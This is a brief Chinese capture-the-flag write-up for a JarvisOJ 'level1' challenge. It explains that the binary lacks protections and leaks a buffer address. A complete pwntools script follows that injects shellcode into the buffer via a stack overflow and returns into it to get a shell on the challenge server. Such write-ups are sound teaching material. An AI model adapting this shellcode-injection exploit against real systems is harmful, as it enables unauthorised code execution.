level1 wp

2018-01-11  本文已影响20人  zs0zrc

拿到题检查下防护机制

发现基本什么防护机制都没打开 ,并且有可执行的段,说明我们可以自己插入shellcode执行

程序打印出了buf的地址,所以我们可以直接在buf区插入一段shellcode来执行shell


#!\usr\bin\env python

from pwn import *

debug = False

local = False

if debug:

context.log_level = 'debug'

else:

context.log_level = 'info'

if local:

p = process('./level1.80eacdcd51aca92af7749d96efad7fb5')

else:

p = remote('pwn2.jarvisoj.com',9877)

p.recvuntil("What's this:")

addr = int(p.recv(10),16)

shellcode = asm(shellcraft.sh())

offset = 0x88

payload= shellcode+(offset-len(shellcode))*'a'+'bbbb'+p32(addr)

p.sendline(payload)

p.interactive()

上一篇 下一篇

猜你喜欢

热点阅读